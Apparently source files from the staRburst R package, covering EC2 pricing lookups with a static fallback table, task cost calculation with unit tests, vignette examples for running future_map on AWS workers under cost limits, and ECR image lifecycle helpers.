#' or an unknown type). Kept as a static snapshot so cost estimates always work.
#' @keywords internal
.static_ec2_prices <- function() {
  list(
    # Graviton3 (ARM64) - 7th gen
    "c7g.large" = 0.0725,
    "c7g.xlarge" = 0.145,
    "c7g.2xlarge" = 0.29,
    "c7g.4xlarge" = 0.58,
    "c7g.8xlarge" = 1.16,
    "c7g.12xlarge" = 1.74,
    "c7g.16xlarge" = 2.32,
    "r7g.large" = 0.1008,
    "r7g.xlarge" = 0.2016,
    "r7g.2xlarge" = 0.4032,
    "r7g.4xlarge" = 0.8064,
    "m7g.large" = 0.0816,
    "m7g.xlarge" = 0.1632,
    "m7g.2xlarge" = 0.3264,
    "t4g.small" = 0.0168,
    "t4g.medium" = 0.0336,
    "t4g.large" = 0.0672,

    # AMD 8th gen (x86_64) - BEST OVERALL PRICE/PERFORMANCE (Feb 2026)
    "c8a.large" = 0.072,
    "c8a.xlarge" = 0.144,
    "c8a.2xlarge" = 0.288,
    "c8a.4xlarge" = 0.576,
    "c8a.8xlarge" = 1.152,
    "c8a.12xlarge" = 1.728,
    "c8a.16xlarge" = 2.304,
    "c8a.24xlarge" = 3.456,
    "c8a.32xlarge" = 4.608,
    "r8a.large" = 0.1008,
    "r8a.xlarge" = 0.2016,
    "r8a.2xlarge" = 0.4032,
    "r8a.4xlarge" = 0.8064,
    "m8a.large" = 0.0816,
    "m8a.xlarge" = 0.1632,
    "m8a.2xlarge" = 0.3264,

    # Graviton4 (ARM64) - 8th gen - Second best price/performance
    "c8g.large" = 0.076,
    "c8g.xlarge" = 0.152,
    "c8g.2xlarge" = 0.304,
    "c8g.4xlarge" = 0.608,
    "c8g.8xlarge" = 1.216,
    "c8g.12xlarge" = 1.824,
    "c8g.16xlarge" = 2.432,
    "r8g.large" = 0.1058,
    "r8g.xlarge" = 0.2116,
    "r8g.2xlarge" = 0.4232,
    "r8g.4xlarge" = 0.8464,
    "m8g.large" = 0.0856,
    "m8g.xlarge" = 0.1712,
    "m8g.2xlarge" = 0.3424,

    # Intel 7th gen (x86_64) - Ice Lake
    "c7i.large" = 0.0893,
    "c7i.xlarge" = 0.1785,
    "c7i.2xlarge" = 0.357,
    "c7i.4xlarge" = 0.714,
    "c7i.8xlarge" = 1.428,
    "c7i.12xlarge" = 2.142,
    "c7i.16xlarge" = 2.856,
    "c6i.large" = 0.085,
    "c6i.xlarge" = 0.17,
    "c6i.2xlarge" = 0.34,
    "c6i.4xlarge" = 0.68,
    "r6i.large" = 0.126,
    "r6i.xlarge" = 0.252,
    "r6i.2xlarge" = 0.504,
    "r6i.4xlarge" = 1.008,
    "m6i.large" = 0.096,
    "m6i.xlarge" = 0.192,
    "m6i.2xlarge" = 0.384,

    # Intel 8th gen (x86_64) - Sapphire Rapids - Highest single-thread performance
    "c8i.large" = 0.0935,
    "c8i.xlarge" = 0.187,
    "c8i.2xlarge" = 0.374,
    "c8i.4xlarge" = 0.748,
    "c8i.8xlarge" = 1.496,
    "c8i.12xlarge" = 2.244,
    "c8i.16xlarge" = 2.992,

    # AMD 7th gen (x86_64) - Best price/performance for x86
    "c7a.large" = 0.0765,
    "c7a.xlarge" = 0.153,
    "c7a.2xlarge" = 0.306,
    "c7a.4xlarge" = 0.612,
    "c7a.8xlarge" = 1.224,
    "c7a.12xlarge" = 1.836,
    "c7a.16xlarge" = 2.448,
    "r7a.large" = 0.1134,
    "r7a.xlarge" = 0.2268,
    "r7a.2xlarge" = 0.4536,
    "r7a.4xlarge" = 0.9072,
    "m7a.large" = 0.0864,
    "m7a.xlarge" = 0.1728,
    "m7a.2xlarge" = 0.3456,

    # AMD 6th gen (x86_64) - Good budget option
    "c6a.large" = 0.0765,
    "c6a.xlarge" = 0.153,
    "c6a.2xlarge" = 0.306,
    "c6a.4xlarge" = 0.612,
    "r6a.large" = 0.1134,
    "r6a.xlarge" = 0.2268,
    "r6a.2xlarge" = 0.4536,
    "m6a.large" = 0.0864,
    "m6a.xlarge" = 0.1728,
    "m6a.2xlarge" = 0.3456
  )
}

#' Get EC2 instance pricing (live, cached, with static fallback)
#'
#' Looks up the current AWS price for an instance type. On-Demand rates come from
#' the AWS Pricing API and Spot rates from EC2 spot-price history; both are cached
#' per session. Any failure (offline, missing perms, unknown type) falls back to a
#' built-in static rate, so cost estimates always return a number.
#'
#' @param instance_type EC2 instance type (e.g., "c7g.xlarge")
#' @param use_spot Whether to use spot pricing
#' @param region AWS region (default: from config or "us-east-1")
#' @return Price per hour in USD
#' @keywords internal
get_ec2_instance_price <- function(instance_type, use_spot = FALSE, region = NULL) {
  region <- region %||% tryCatch(get_starburst_config()$region, error = function(e) NULL) %||%
    "us-east-1"
  cache_key <- sprintf("%s|%s|%s", instance_type, region, isTRUE(use_spot))
  if (!is.null(.price_cache[[cache_key]])) {
    return(.price_cache[[cache_key]])
  }

  static_price <- .static_ec2_prices()[[instance_type]]

  price <- tryCatch({
    if (use_spot) {
      get_ec2_spot_price(instance_type, region)
    } else {
      get_ec2_ondemand_price(instance_type, region)
    }
  }, error = function(e) NULL)

  if (is.null(price) || !is.finite(price) || price <= 0) {
    # Fall back to the static snapshot.
    if (is.null(static_price)) {
      cat_warn(sprintf("No live or static price for %s; using conservative estimate\n",
                       instance_type))
      static_price <- 0.15
    }
    price <- if (use_spot) static_price * 0.3 else static_price
  }

  .price_cache[[cache_key]] <- price
  price
}

#' Look up current On-Demand price via the AWS Pricing API.
#' @keywords internal
get_ec2_ondemand_price <- function(instance_type, region) {
  pricing <- paws.cost.management::pricing(config = list(region = "us-east-1"))
  resp <- pricing$get_products(
    ServiceCode = "AmazonEC2",
    Filters = list(
      list(Type = "TERM_MATCH", Field = "instanceType", Value = instance_type),
      list(Type = "TERM_MATCH", Field = "regionCode", Value = region),
      list(Type = "TERM_MATCH", Field = "operatingSystem", Value = "Linux"),
      list(Type = "TERM_MATCH", Field = "tenancy", Value = "Shared"),
      list(Type = "TERM_MATCH", Field = "capacitystatus", Value = "Used"),
      list(Type = "TERM_MATCH", Field = "preInstalledSw", Value = "NA")
    ),
    MaxResults = 1
  )
  if (length(resp$PriceList) == 0) return(NULL)
  # PriceList[[1]] is a JSON string; dig out the On-Demand USD price dimension.
  product <- jsonlite::fromJSON(resp$PriceList[[1]], simplifyVector = FALSE)
  on_demand <- product$terms$OnDemand
  price_dim <- on_demand[[1]]$priceDimensions
  usd <- price_dim[[1]]$pricePerUnit$USD
  as.numeric(usd)
}

#' Look up recent Spot price via EC2 spot-price history (avg across AZs).
#' @keywords internal
get_ec2_spot_price <- function(instance_type, region) {
  ec2 <- paws.compute::ec2(config = list(region = region))
  resp <- ec2$describe_spot_price_history(
    InstanceTypes = list(instance_type),
    ProductDescriptions = list("Linux/UNIX"),
    MaxResults = 10
  )
  if (length(resp$SpotPriceHistory) == 0) return(NULL)
  prices <- vapply(resp$SpotPriceHistory,
                   function(x) as.numeric(x$SpotPrice), numeric(1))
  prices <- prices[is.finite(prices) & prices > 0]
  if (length(prices) == 0) return(NULL)
  mean(prices)
}

#' Get vCPU count for instance type
#'
#' @param instance_type EC2 instance type
#' @return Number of vCPUs
#' @keywords internal
get_instance_vcpus <- function(instance_type) {
  # Parse instance size to determine vCPUs
  # Format: family + generation + size (e.g., c7g.xlarge)
  size_mapping <- list(
    "nano" = 0.25,
    "micro" = 0.5,
    "small" = 1,
    "medium" = 2,
    "large" = 2,
    "xlarge" = 4,
    "2xlarge" = 8,
    "4xlarge" = 16,
    "8xlarge" = 32,
    "12xlarge" = 48,
    "16xlarge" = 64,
    "24xlarge" = 96,
    "32xlarge" = 128
  )

  # Extract size from instance type
  parts <- strsplit(instance_type, "\\.")[[1]]
  if (length(parts) < 2) {
    stop(sprintf("Invalid instance type format: %s", instance_type))
  }

  size <- parts[2]
  vcpus <- size_mapping[[size]]

  if (is.null(vcpus)) {
    stop(sprintf("Unknown instance size: %s", size))
  }

  return(vcpus)
}

#' Calculate task cost
#'
#' @keywords internal
calculate_task_cost <- function(future) {
  # Get actual runtime
  if (is.null(future$completed_at)) {
    return(0)
  }

  runtime_hours <- as.numeric(
    difftime(future$completed_at, future$submitted_at, units = "hours")
  )

  # Calculate cost
  cost_est <- estimate_cost(1, future$plan$cpu, future$plan$memory, runtime_hours)
  cost_est$total_estimated
}

#' Calculate total cost
#'
#' @keywords internal
calculate_total_cost <- function(plan) {
  ecs <- get_ecs_client(plan$region)

  # Per-task hourly rate for THIS plan's backend (EC2 instance type / spot, or
  # Fargate cpu+memory), via the normalized estimator — not a Fargate-only guess.
  per_task_hourly <- estimate_cost(
    workers = 1,
    cpu = plan$worker_cpu %||% plan$cpu %||% 4,
    memory = plan$worker_memory %||% plan$memory %||% "8GB",
    launch_type = plan$launch_type %||% "FARGATE",
    instance_type = plan$instance_type,
    use_spot = plan$use_spot %||% FALSE
  )$hourly_rate

  total_cost <- 0

  tryCatch({
    # Get all task ARNs for this cluster
    task_arns <- list()
    stored_tasks <- list_task_arns()

    for (task_id in names(stored_tasks)) {
      task_arns <- append(task_arns, stored_tasks[[task_id]]$task_arn)
    }

    if (length(task_arns) == 0) {
      return(0)
    }

    # Describe tasks to get runtime information
    # Process in batches of 100 (ECS limit)
    batch_size <- 100
    for (i in seq(1, length(task_arns), by = batch_size)) {
      end_idx <- min(i + batch_size - 1, length(task_arns))
      batch <- task_arns[i:end_idx]

      tasks <- ecs$describe_tasks(
        cluster = "starburst-cluster",
        tasks = batch
      )

      for (task in tasks$tasks) {
        # Calculate runtime
        if (!is.null(task$startedAt)) {
          started <- as.POSIXct(task$startedAt, origin = "1970-01-01")

          stopped <- if (!is.null(task$stoppedAt)) {
            as.POSIXct(task$stoppedAt, origin = "1970-01-01")
          } else {
            Sys.time()  # Still running
          }

          runtime_hours <- as.numeric(difftime(stopped, started, units = "hours"))

          # Cost = this task's runtime x the per-task hourly rate for the backend.
          total_cost <- total_cost + runtime_hours * per_task_hourly
        }
      }
    }

    return(total_cost)

  }, error = function(e) {
    # If we can't get actual costs, return tracked estimate
    if (!is.null(plan$total_cost)) {
      return(plan$total_cost)
    }
    return(0)
  })
}

test_that("calculate_total_cost handles empty task list", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  plan <- list(
    region = "us-east-1",
    worker_cpu = 2,
    worker_memory = 8
  )

  # Mock list_task_arns to return empty
  mockery::stub(calculate_total_cost, "list_task_arns", function() {
    list()
  })

  result <- calculate_total_cost(plan)
  expect_equal(result, 0)
})

test_that("calculate_total_cost calculates from actual task runtimes", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  plan <- list(
    region = "us-east-1",
    worker_cpu = 2,    # 2 vCPUs
    worker_memory = 8  # 8 GB
  )

  # Mock list_task_arns
  mockery::stub(calculate_total_cost, "list_task_arns", function() {
    list(
      "task-1" = list(task_arn = "arn:task-1"),
      "task-2" = list(task_arn = "arn:task-2")
    )
  })

  # Mock ECS client
  ecs_client <- list(
    describe_tasks = function(...) {
      # Task ran for 1 hour
      start_time <- as.numeric(Sys.time()) - 3600
      stop_time <- as.numeric(Sys.time())

      list(
        tasks = list(
          list(
            startedAt = start_time,
            stoppedAt = stop_time
          ),
          list(
            startedAt = start_time,
            stoppedAt = stop_time
          )
        )
      )
    }
  )

  mockery::stub(calculate_total_cost, "get_ecs_client", function(...) {
    ecs_client
  })

  result <- calculate_total_cost(plan)

  # Expected cost for 2 tasks, each running 1 hour:
  # vCPU cost: 2 vCPU * $0.04048/vCPU-hour * 1 hour * 2 tasks = $0.16192
  # Memory cost: 8 GB * $0.004445/GB-hour * 1 hour * 2 tasks = $0.07112
  # Total: $0.23304
  expect_gt(result, 0.2)
  expect_lt(result, 0.3)
})

test_that("calculate_total_cost handles running tasks", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  plan <- list(
    region = "us-east-1",
    worker_cpu = 1,
    worker_memory = 2
  )

  # Mock list_task_arns
  mockery::stub(calculate_total_cost, "list_task_arns", function() {
    list("task-1" = list(task_arn = "arn:task-1"))
  })

  # Mock ECS client - task still running (no stoppedAt)
  ecs_client <- list(
    describe_tasks = function(...) {
      start_time <- as.numeric(Sys.time()) - 1800  # Started 30 min ago

      list(
        tasks = list(
          list(
            startedAt = start_time,
            stoppedAt = NULL  # Still running
          )
        )
      )
    }
  )

  mockery::stub(calculate_total_cost, "get_ecs_client", function(...) {
    ecs_client
  })

  result <- calculate_total_cost(plan)

  # Should calculate cost from start time to now
  expect_gt(result, 0)
})

test_that("calculate_total_cost handles batches of tasks", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  plan <- list(
    region = "us-east-1",
    worker_cpu = 1,
    worker_memory = 2
  )

  # Create 150 tasks (more than batch size of 100)
  task_list <- list()
  for (i in 1:150) {
    task_list[[paste0("task-", i)]] <- list(task_arn = paste0("arn:task-", i))
  }

  mockery::stub(calculate_total_cost, "list_task_arns", function() {
    task_list
  })

  batch_count <- 0

  # Mock ECS client
  ecs_client <- list(
    describe_tasks = function(cluster, tasks) {
      batch_count <<- batch_count + 1

      # Return mock tasks in correct format
      list(tasks = lapply(tasks, function(arn) {
        list(
          startedAt = as.numeric(Sys.time()) - 3600,
          stoppedAt = as.numeric(Sys.time())
        )
      }))
    }
  )

  mockery::stub(calculate_total_cost, "get_ecs_client", function(...) {
    ecs_client
  })

  result <- calculate_total_cost(plan)

  # Should make 2 batches (100 + 50)
  expect_equal(batch_count, 2)
  expect_gt(result, 0)
})

test_that("calculate_total_cost falls back to plan cost on error", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  plan <- list(
    region = "us-east-1",
    worker_cpu = 2,
    worker_memory = 8,
    total_cost = 1.5  # Fallback value
  )

  # Mock list_task_arns to throw error
  mockery::stub(calculate_total_cost, "list_task_arns", function() {
    stop("AWS error")
  })

  result <- calculate_total_cost(plan)

  expect_equal(result, 1.5)
})

test_that("estimate_cost returns a normalized hourly_rate for every backend", {
  fg <- estimate_cost(10, 4, "8GB", launch_type = "FARGATE")
  expect_true(!is.null(fg$hourly_rate) && fg$hourly_rate > 0)
  expect_equal(fg$hourly_rate, fg$per_hour)  # back-compat field agrees

  # EC2 On-Demand and Spot both expose hourly_rate (== total_per_hour)
  ec2_od <- estimate_cost(10, 4, "8GB", launch_type = "EC2",
                          instance_type = "c7g.xlarge", use_spot = FALSE)
  expect_true(!is.null(ec2_od$hourly_rate) && ec2_od$hourly_rate > 0)
  expect_equal(ec2_od$hourly_rate, ec2_od$total_per_hour)

  ec2_spot <- estimate_cost(10, 4, "8GB", launch_type = "EC2",
                            instance_type = "c7g.xlarge", use_spot = TRUE)
  expect_true(!is.null(ec2_spot$hourly_rate) && ec2_spot$hourly_rate > 0)
  # spot should be cheaper than on-demand for the same shape
  expect_lt(ec2_spot$hourly_rate, ec2_od$hourly_rate)
})

test_that("max_hourly_cost guard fires on the EC2 default path (regression)", {
  skip_if_not_installed("mockery")

  # Regression: the guard read cost_est$per_hour, which is NULL on EC2, so the
  # limit was silently unenforced on the default backend. It must STOP now.
  mockery::stub(plan.starburst, "get_starburst_config",
                function() list(region = "us-east-1", max_hourly_cost = 0.01))
  mockery::stub(plan.starburst, "check_aws_credentials", function() TRUE)
  mockery::stub(plan.starburst, "check_ecr_image_exists", function(...) TRUE)

  expect_error(
    plan.starburst(strategy = starburst, workers = 50, cpu = 4,
                   launch_type = "EC2", instance_type = "c7g.xlarge",
                   use_spot = FALSE),
    "exceeds limit"
  )
})

test_that("cost_alert_threshold warns but does NOT stop the plan", {
  skip_if_not_installed("mockery")

  # Alert threshold below the estimate, and NO max_hourly_cost, so the only thing
  # that could halt on cost is the alert — which must warn, not stop. We let the
  # plan proceed past the cost checks and throw a sentinel at ensure_environment()
  # to prove execution continued past the alert.
  mockery::stub(plan.starburst, "get_starburst_config",
                function() list(region = "us-east-1", cost_alert_threshold = 0.01))
  mockery::stub(plan.starburst, "check_aws_credentials", function() TRUE)
  mockery::stub(plan.starburst, "ensure_environment",
                function(...) stop("SENTINEL: reached environment setup"))

  out <- capture.output(
    err <- tryCatch(
      plan.starburst(strategy = starburst, workers = 50, cpu = 4,
                     launch_type = "EC2", instance_type = "c7g.xlarge",
                     use_spot = FALSE),
      error = function(e) conditionMessage(e)
    )
  )

  # It stopped at the sentinel (i.e. it got PAST the alert), not on the alert.
  expect_match(err, "SENTINEL")
  # And the alert warning was emitted.
  expect_match(paste(out, collapse = "\n"), "alert threshold", fixed = TRUE)
})

test_that("get_ec2_instance_price falls back to static rate when live lookup fails", {
  skip_if_not_installed("mockery")

  # Clear any cached value for this key, then force the live lookup to error.
  mockery::stub(get_ec2_instance_price, "get_ec2_ondemand_price",
                function(...) stop("no network"))
  mockery::stub(get_ec2_instance_price, "get_starburst_config",
                function() list(region = "us-east-1"))

  price <- get_ec2_instance_price("c7g.xlarge", use_spot = FALSE, region = "us-east-1")
  # Falls back to the static snapshot value for c7g.xlarge.
  expect_equal(price, .static_ec2_prices()[["c7g.xlarge"]])
})

test_that("get_ec2_instance_price uses the live rate when available", {
  skip_if_not_installed("mockery")

  mockery::stub(get_ec2_instance_price, "get_ec2_ondemand_price", function(...) 0.999)
  mockery::stub(get_ec2_instance_price, "get_starburst_config",
                function() list(region = "us-east-1"))

  # Unique region key avoids the session cache from the previous test.
  price <- get_ec2_instance_price("c7g.xlarge", use_spot = FALSE, region = "eu-west-1")
  expect_equal(price, 0.999)
})

## ----setup, include = FALSE---------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>",
  eval = FALSE
)

## -----------------------------------------------------------------------------
# # Install from GitHub
# remotes::install_github("scttfrdmn/starburst")

## -----------------------------------------------------------------------------
# library(starburst)
# 
# # Interactive setup wizard
# starburst_setup()

## -----------------------------------------------------------------------------
# library(starburst)
# 
# # Define your work
# expensive_simulation <- function(i) {
#   # Some computation that takes a few minutes
#   results <- replicate(1000, {
#     x <- rnorm(10000)
#     mean(x^2)
#   })
#   mean(results)
# }
# 
# # Run across 50 cloud workers (EC2 by default)
# results <- starburst_map(1:100, expensive_simulation, workers = 50)
# #> [Starting] Starting starburst cluster with 50 workers
# #> [Status] Processing 100 items with 50 workers
# #> [Starting] Submitting 100 tasks...
# #> [Wait] Progress: 100/100 (128.0s)
# #> [OK] Completed in 128.0 seconds
# #> [Cost] Estimated cost: $0.85

## -----------------------------------------------------------------------------
# library(furrr)
# library(starburst)
# 
# # Local baseline
# plan(sequential)
# results_local <- future_map(1:100, expensive_simulation)
# 
# # Same code, now on 50 cloud workers — just change the plan
# plan(starburst, workers = 50)
# results_cloud <- future_map(1:100, expensive_simulation)
# 
# # Results are identical to the local run
# identical(results_local, results_cloud)
# #> [1] TRUE

## -----------------------------------------------------------------------------
# # Direct API
# results <- starburst_map(1:100, expensive_simulation, workers = 50)
# 
# # future / furrr
# plan(starburst, workers = 50)
# results <- future_map(1:100, expensive_simulation)

## -----------------------------------------------------------------------------
# # Download an s3://bucket/key object to a temp file and read it on the worker.
# read_s3 <- function(s3_uri, reader = readRDS) {
#   m <- regmatches(s3_uri, regexec("^s3://([^/]+)/(.+)$", s3_uri))[[1]]
#   bucket <- m[2]; key <- m[3]
#   tmp <- tempfile()
#   obj <- paws.storage::s3()$get_object(Bucket = bucket, Key = key)
#   writeBin(obj$Body, tmp)
#   reader(tmp)
# }

## -----------------------------------------------------------------------------
# plan(starburst, workers = 50)
# 
# results <- future_map(file_list, function(file) {
#   # Each worker pulls its file from S3 (read_s3 defined above)
#   data <- read_s3(sprintf("s3://my-bucket/%s", file), reader = read.csv)
#   process(data)
# })

## -----------------------------------------------------------------------------
# # Load data locally
# data <- read.csv("local_file.csv")
# 
# # staRburst automatically uploads to S3 and distributes
# plan(starburst, workers = 50)
# 
# # `replicates` is your vector of inputs (e.g. bootstrap replicate ids)
# results <- future_map(replicates, function(i) {
#   # Each worker gets a copy of 'data'
#   bootstrap_analysis(data, i)
# })

## -----------------------------------------------------------------------------
# # Upload once from your machine
# paws.storage::s3()$put_object(
#   Bucket = "my-bucket", Key = "large_data.rds",
#   Body = "huge_file.rds"
# )
# s3_path <- "s3://my-bucket/large_data.rds"
# 
# # Workers read from S3 inside the task (read_s3 helper defined above)
# plan(starburst, workers = 100)
# 
# # `tasks` is your vector of work items
# results <- future_map(tasks, function(i) {
#   data <- read_s3(s3_path)   # readRDS by default
#   process(data, i)
# })

## -----------------------------------------------------------------------------
# # Check cost before running
# plan(starburst, workers = 100, cpu = 4, memory = "8GB")
# #> Estimated cost: ~$3.50/hour

## -----------------------------------------------------------------------------
# # Set an hourly cost ceiling (USD/hour) — jobs above this rate won't start
# starburst_config(
#   max_hourly_cost = 10,       # Don't start jobs estimated over $10/hour
#   cost_alert_threshold = 5     # Warn at $5/hour
# )
# 
# # Now jobs exceeding limit will error before starting
# plan(starburst, workers = 1000)  # Would cost ~$35/hour
# #> Error: Estimated cost ($35/hr) exceeds limit ($10/hr)

## -----------------------------------------------------------------------------
# plan(starburst, workers = 50)
# 
# results <- future_map(data, process)
# 
# #> Cluster runtime: ~23 minutes
# #> Estimated cost: ~$1.34

## -----------------------------------------------------------------------------
# starburst_quota_status()
# #> Fargate vCPU Quota: 100 / 100 used
# #> Allows: ~25 workers with 4 vCPUs each
# #>
# #> Recommended: Request increase to 500 vCPUs

## -----------------------------------------------------------------------------
# starburst_request_quota_increase(vcpus = 500)
# #> Requesting Fargate vCPU quota increase:
# #>   Current: 100 vCPUs
# #>   Requested: 500 vCPUs
# #>
# #> [OK] Quota increase requested (Case ID: 12345678)
# #> [OK] AWS typically approves within 1-24 hours

## -----------------------------------------------------------------------------
# # Quota allows 25 workers, but you request 100
# plan(starburst, workers = 100, cpu = 4)
# 
# #> [!] Requested: 100 workers (400 vCPUs)
# #> [!] Current quota: 100 vCPUs (allows 25 workers max)
# #>
# #> [Plan] Execution plan:
# #>   - Running in 4 waves of 25 workers each
# #>
# #> [TIP] Request quota increase to 500 vCPUs? [y/n]: y
# #>
# #> [OK] Quota increase requested
# #> [Starting] Starting wave 1 (25 workers)...
# 
# results <- future_map(inputs, expensive_function)
# 
# #> [Wave] Wave 1: 100% complete (250 tasks)
# #> [Wave] Wave 2: 100% complete (500 tasks)
# #> [Wave] Wave 3: 100% complete (750 tasks)
# #> [Wave] Wave 4: 100% complete (1000 tasks)

## -----------------------------------------------------------------------------
# # View logs from most recent cluster
# starburst_logs()
# 
# # View logs from specific task
# starburst_logs(task_id = "abc-123")
# 
# # View last 100 log lines
# starburst_logs(last_n = 100)

## -----------------------------------------------------------------------------
# starburst_status()
# #> Active Clusters:
# #>   • starburst-xyz123: 50 workers running
# #>   • starburst-abc456: 25 workers running

## -----------------------------------------------------------------------------
# # Rebuild environment
# starburst_rebuild_environment()

## -----------------------------------------------------------------------------
# # Check logs
# starburst_logs(task_id = "failed-task-id")
# 
# # Often due to memory limits - increase worker memory
# plan(starburst, workers = 50, memory = "16GB")  # Default is 8GB

## -----------------------------------------------------------------------------
# # Use Arrow for data frames
# library(arrow)
# write_parquet(my_data, "s3://bucket/data.parquet")
# 
# # Workers read Arrow
# results <- future_map(1:100, function(i) {
#   data <- read_parquet("s3://bucket/data.parquet")
#   process(data, i)
# })

## -----------------------------------------------------------------------------
# # 100 tasks, each takes 10 minutes
# # Local: 1000 minutes, Cloud: ~10 minutes

## -----------------------------------------------------------------------------
# # 10000 tasks, each takes 30 seconds
# # Startup overhead (45s) dominates

## -----------------------------------------------------------------------------
# # 10,000 tiny tasks
# results <- future_map(1:10000, small_function)

## -----------------------------------------------------------------------------
# # 100 batches of 100 tasks each
# batches <- split(1:10000, ceiling(seq_along(1:10000) / 100))
# 
# results <- future_map(batches, function(batch) {
#   lapply(batch, small_function)
# })
# 
# # Flatten results
# results <- unlist(results, recursive = FALSE)

## -----------------------------------------------------------------------------
# big_data <- read.csv("10GB_file.csv")  # Upload for every task
# results <- future_map(1:1000, function(i) process(big_data, i))

## -----------------------------------------------------------------------------
# # Upload once to S3
# tmp <- tempfile(fileext = ".csv"); write.csv(big_data, tmp, row.names = FALSE)
# paws.storage::s3()$put_object(Bucket = "bucket", Key = "big_data.csv", Body = tmp)
# 
# # Workers read from S3 (read_s3 helper from "Working with Data" above)
# results <- future_map(tasks, function(i) {
#   data <- read_s3("s3://bucket/big_data.csv", reader = read.csv)
#   process(data, i)
# })

## -----------------------------------------------------------------------------
# starburst_config(
#   max_hourly_cost = 50,            # Cap the hourly rate (USD/hour)
#   cost_alert_threshold = 25        # Get warned early
# )

## -----------------------------------------------------------------------------
# # staRburst auto-cleans, but you can force it
# plan(sequential)  # Switch back to local
# # Old cluster resources are cleaned up automatically

## -----------------------------------------------------------------------------
# # High CPU, low memory (CPU-bound work)
# plan(starburst, workers = 50, cpu = 8, memory = "16GB")
# 
# # Low CPU, high memory (memory-bound work)
# plan(starburst, workers = 25, cpu = 4, memory = "32GB")

## -----------------------------------------------------------------------------
# # Increase timeout for long-running tasks (default 1 hour)
# plan(starburst, workers = 10, timeout = 7200)  # 2 hours

## -----------------------------------------------------------------------------
# # Use specific region (default from config)
# plan(starburst, workers = 50, region = "us-west-2")

#' ECR repositories and Docker environment images for staRburst
#'
#' Functions for building and tracking the worker Docker images stored in ECR,
#' including the shared base image and per-environment images keyed by a hash
#' of the project's renv.lock.
#'
#' @name images
#' @keywords internal
NULL

#' Create ECR lifecycle policy to auto-delete old images
#'
#' @param region AWS region
#' @param repository_name ECR repository name
#' @param ttl_days Number of days to keep images (NULL = no auto-delete)
#' @keywords internal
create_ecr_lifecycle_policy <- function(region, repository_name, ttl_days = NULL) {
  if (is.null(ttl_days)) {
    return(invisible(NULL))
  }

  ecr <- get_ecr_client(region)

  # Create lifecycle policy that deletes images older than ttl_days
  # This runs automatically in AWS - no starburst needed
  policy <- list(
    rules = list(
      list(
        rulePriority = 1L,
        description = sprintf("Auto-delete starburst images after %d days of no use", ttl_days),
        selection = list(
          tagStatus = "any",
          countType = "sinceImagePushed",
          countUnit = "days",
          countNumber = as.integer(ttl_days)
        ),
        action = list(
          type = "expire"
        )
      )
    )
  )

  tryCatch({
    ecr$put_lifecycle_policy(
      repositoryName = repository_name,
      lifecyclePolicyText = jsonlite::toJSON(policy, auto_unbox = TRUE)
    )
    cat_success(sprintf("[OK] ECR auto-cleanup enabled: Images deleted after %d days\n", ttl_days))
  }, error = function(e) {
    cat_warn(sprintf("[WARNING] Failed to set ECR lifecycle policy: %s\n", e$message))
  })
}

#' Check ECR image age and suggest/force rebuild
#'
#' @param region AWS region
#' @param image_tag Image tag to check
#' @param ttl_days TTL setting (NULL = no check)
#' @param force_rebuild Force rebuild if past TTL
#' @return TRUE if image is fresh or doesn't exist, FALSE if stale
#' @keywords internal
check_ecr_image_age <- function(region, image_tag, ttl_days = NULL, force_rebuild = FALSE) {
  if (is.null(ttl_days)) {
    return(TRUE)  # No TTL, always consider fresh
  }

  ecr <- get_ecr_client(region)
  config <- get_starburst_config()
  repo_name <- "starburst-worker"

  # Get image details
  image_exists <- tryCatch({
    result <- ecr$describe_images(
      repositoryName = repo_name,
      imageIds = list(list(imageTag = image_tag))
    )
    length(result$imageDetails) > 0
  }, error = function(e) {
    FALSE
  })

  if (!image_exists) {
    return(TRUE)  # Image doesn't exist, will be built
  }

  # Get image push timestamp
  image_details <- ecr$describe_images(
    repositoryName = repo_name,
    imageIds = list(list(imageTag = image_tag))
  )$imageDetails[[1]]

  push_time <- image_details$imagePushedAt
  age_days <- as.numeric(difftime(Sys.time(), push_time, units = "days"))

  # Check if image is stale
  if (age_days > ttl_days) {
    if (force_rebuild) {
      cat_warn(sprintf("[WARNING] Image is %.0f days old (TTL: %d days), rebuilding...\n",
                         age_days, ttl_days))
      return(FALSE)  # Signal rebuild needed
    } else {
      cat_warn(sprintf("[WARNING] Image is %.0f days old (TTL: %d days)\n", age_days, ttl_days))
      cat_info("  AWS will auto-delete soon. Consider running a job to refresh.\n")
      return(TRUE)  # Use existing but warn
    }
  } else {
    days_remaining <- ttl_days - age_days
    cat_info(sprintf("[OK] Image age: %.0f days (%.0f days until auto-delete)\n",
                    age_days, days_remaining))
    return(TRUE)
  }
}

#' Compute environment image hash
#'
#' Computes the hash used to tag environment Docker images, combining the
#' renv.lock file contents with the starburst package version. This ensures
#' new images are built when either the R package environment or the starburst
#' worker script changes.
#'
#' @param lock_file Path to renv.lock file
#' @return MD5 hash string
#' @keywords internal
compute_env_hash <- function(lock_file) {
  # Read version from DESCRIPTION to handle dev vs installed discrepancies
  desc_path <- system.file("DESCRIPTION", package = "starburst")
  if (nzchar(desc_path)) {
    pkg_version <- read.dcf(desc_path, fields = "Version")[1, "Version"]
  } else {
    pkg_version <- as.character(utils::packageVersion("starburst"))
  }
  hash_input <- paste0(readLines(lock_file, warn = FALSE), collapse = "\n", pkg_version)
  digest::digest(hash_input, algo = "md5")
}

#' Ensure environment is ready
#'
#' @keywords internal
ensure_environment <- function(region) {
  # Get renv lock file hash
  lock_file <- renv::paths$lockfile()

  # Walk up directory tree to find the canonical package root renv.lock.
  # This is needed because testthat sets CWD to tests/testthat/ during tests,
  # causing renv::paths$lockfile() to return tests/testthat/renv.lock instead
  # of the package root renv.lock. We prefer the renv.lock closest to an R/
  # directory (indicating an R package root).
  search_dir <- dirname(lock_file)
  found_root_lock <- FALSE
  for (i in seq_len(10)) {
    parent <- dirname(search_dir)
    if (parent == search_dir) break  # reached filesystem root
    candidate <- file.path(parent, "renv.lock")
    if (file.exists(candidate) && dir.exists(file.path(parent, "R"))) {
      # Found a renv.lock next to an R/ directory - this is the package root
      lock_file <- candidate
      found_root_lock <- TRUE
      break
    }
    search_dir <- parent
  }

  if (!file.exists(lock_file)) {
    # No lockfile found anywhere - create a new snapshot as fallback
    # force = TRUE allows locally installed packages like starburst itself
    renv::snapshot(prompt = FALSE, force = TRUE)
